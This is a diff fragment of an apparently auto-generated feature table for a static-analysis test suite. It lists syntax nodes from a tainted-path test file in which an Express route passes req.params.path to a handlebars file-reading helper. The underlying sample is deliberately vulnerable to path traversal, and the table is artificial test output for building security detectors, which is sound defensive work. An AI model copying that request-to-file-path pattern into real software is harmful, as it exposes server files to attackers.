catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:40:39:40:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:5:41:7 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:5:41:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:5:41:7 | res | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:5:41:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:5:41:7 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:5:41:12 | res.send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:5:41:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:5:41:12 | res.send | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:5:41:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:5:41:12 | res.send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | exceptional return of res.sen ... })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | exceptional return of res.sen ... })) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | exceptional return of res.sen ... })) | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | exceptional return of res.sen ... })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | exceptional return of res.sen ... })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | res.sen ... })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | res.sen ... })) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | res.sen ... })) | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | res.sen ... })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:5:44:7 | res.sen ... })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:9:41:12 | send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:9:41:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:9:41:12 | send | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:9:41:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:9:41:12 | send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:14:41:17 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:14:41:17 | data | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:14:41:17 | data | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:14:41:17 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:14:41:17 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:14:41:31 | data.compiledMixed | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:14:41:31 | data.compiledMixed | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:14:41:31 | data.compiledMixed | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:14:41:31 | data.compiledMixed | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:14:41:31 | data.compiledMixed | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:41:14:44:6 | data.co ... \\n }) | CalleeFlexibleAccessPath | res.send | | autogenerated/TaintedPath/handlebars.js:41:14:44:6 | data.co ... \\n }) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:41:14:44:6 | data.co ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7272,6 +68597,16 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:41:14:44:6 | data.co ... \\n }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:41:14:44:6 | data.co ... \\n }) | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:41:14:44:6 | data.co ... \\n }) | receiverName | res | +| autogenerated/TaintedPath/handlebars.js:41:14:44:6 | exceptional return of data.co ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:14:44:6 | exceptional return of data.co ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:41:14:44:6 | exceptional return of data.co ... \\n }) | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:14:44:6 | exceptional return of data.co ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:14:44:6 | exceptional return of data.co ... \\n }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:41:19:41:31 | compiledMixed | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:41:19:41:31 | compiledMixed | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:41:19:41:31 | compiledMixed | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:41:19:41:31 | compiledMixed | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:41:19:41:31 | compiledMixed | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:41:33:44:5 | {\\n ... )\\n } | CalleeFlexibleAccessPath | data.compiledMixed | | autogenerated/TaintedPath/handlebars.js:41:33:44:5 | {\\n ... )\\n } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:41:33:44:5 | {\\n ... )\\n } | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7280,6 +68615,21 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:41:33:44:5 | {\\n ... )\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:41:33:44:5 | {\\n ... )\\n } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:41:33:44:5 | {\\n ... )\\n } | receiverName | data | +| autogenerated/TaintedPath/handlebars.js:42:9:42:14 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:42:9:42:14 | prefix | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:42:9:42:14 | prefix | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:42:9:42:14 | prefix | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:42:9:42:14 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:42:9:42:22 | prefix: ">>> " | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:42:17:42:22 | ">>> " | CalleeFlexibleAccessPath | data.compiledMixed | | autogenerated/TaintedPath/handlebars.js:42:17:42:22 | ">>> " | InputAccessPathFromCallee | 0.prefix | | autogenerated/TaintedPath/handlebars.js:42:17:42:22 | ">>> " | InputArgumentIndex | 0 | @@ -7289,6 +68639,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:42:17:42:22 | ">>> " | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | | autogenerated/TaintedPath/handlebars.js:42:17:42:22 | ">>> " | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:42:17:42:22 | ">>> " | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:9:43:12 | path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:9:43:12 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:43:9:43:12 | path | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:9:43:12 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:9:43:12 | path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:9:43:29 | path: r ... ms.path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:15:43:17 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:15:43:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:43:15:43:17 | req | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:15:43:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:15:43:17 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:15:43:24 | req.params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:15:43:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:43:15:43:24 | req.params | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:15:43:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:15:43:24 | req.params | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:43:15:43:29 | req.params.path | CalleeFlexibleAccessPath | data.compiledMixed | | autogenerated/TaintedPath/handlebars.js:43:15:43:29 | req.params.path | InputAccessPathFromCallee | 0.path | | autogenerated/TaintedPath/handlebars.js:43:15:43:29 | req.params.path | InputArgumentIndex | 0 | @@ -7298,6 +68673,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:43:15:43:29 | req.params.path | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | | autogenerated/TaintedPath/handlebars.js:43:15:43:29 | req.params.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:43:15:43:29 | req.params.path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:19:43:24 | params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:19:43:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:43:19:43:24 | params | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:19:43:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:19:43:24 | params | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:43:26:43:29 | path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:43:26:43:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:43:26:43:29 | path | enclosingFunctionBody | req res res send data compiledMixed prefix >>> path req params path | +| autogenerated/TaintedPath/handlebars.js:43:26:43:29 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:43:26:43:29 | path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:1:47:3 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:1:47:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:1:47:3 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:1:47:7 | app.get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:1:47:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:1:47:7 | app.get | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:1:52:2 | app.get ... }));\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:1:52:2 | app.get ... }));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:1:52:2 | app.get ... }));\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:1:52:2 | exceptional return of app.get ... }));\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:1:52:2 | exceptional return of app.get ... }));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:1:52:2 | exceptional return of app.get ... }));\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:5:47:7 | get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:5:47:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:5:47:7 | get | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:47:9:47:21 | '/some/path5' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:47:9:47:21 | '/some/path5' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:47:9:47:21 | '/some/path5' | calleeImports | express | @@ -7305,6 +68705,26 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:47:9:47:21 | '/some/path5' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:47:9:47:21 | '/some/path5' | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:47:9:47:21 | '/some/path5' | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | data | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | this | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:24:47:23 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | 'arguments' object of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | exceptional return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | exceptional return of anonymous function | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:47:24:52:1 | functio ... }));\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:47:24:52:1 | functio ... }));\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:47:24:52:1 | functio ... }));\\n} | calleeImports | express | @@ -7312,6 +68732,66 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:47:24:52:1 | functio ... }));\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/handlebars.js:47:24:52:1 | functio ... }));\\n} | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:47:24:52:1 | functio ... }));\\n} | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | return of anonymous function | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:24:52:1 | return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:34:47:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:47:39:47:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:5:48:7 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:5:48:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:5:48:7 | res | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:5:48:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:5:48:7 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:5:48:12 | res.send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:5:48:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:5:48:12 | res.send | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:5:48:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:5:48:12 | res.send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | exceptional return of res.sen ... })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | exceptional return of res.sen ... })) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | exceptional return of res.sen ... })) | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | exceptional return of res.sen ... })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | exceptional return of res.sen ... })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | res.sen ... })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | res.sen ... })) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | res.sen ... })) | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | res.sen ... })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:5:51:7 | res.sen ... })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:9:48:12 | send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:9:48:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:9:48:12 | send | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:9:48:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:9:48:12 | send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:14:48:17 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:14:48:17 | data | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:14:48:17 | data | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:14:48:17 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:14:48:17 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:48:14:48:31 | data.compiledMixed | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:48:14:48:31 | data.compiledMixed | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:48:14:48:31 | data.compiledMixed | enclosingFunctionBody | req res res send data compiledMixed prefix req params prefix path data/path-5.txt | +| autogenerated/TaintedPath/handlebars.js:48:14:48:31 | data.compiledMixed | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:48:14:48:31 | data.compiledMixed | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:48:14:51:6 | data.co ... \\n }) | CalleeFlexibleAccessPath | res.send | | autogenerated/TaintedPath/handlebars.js:48:14:51:6 | data.co ... \\n }) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:48:14:51:6 | data.co ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7320,6 +68800,16 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:48:14:51:6 | data.co ... \\n }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:48:14:51:6 | data.co ... \\n }) | fileImports | express fs handlebars | | 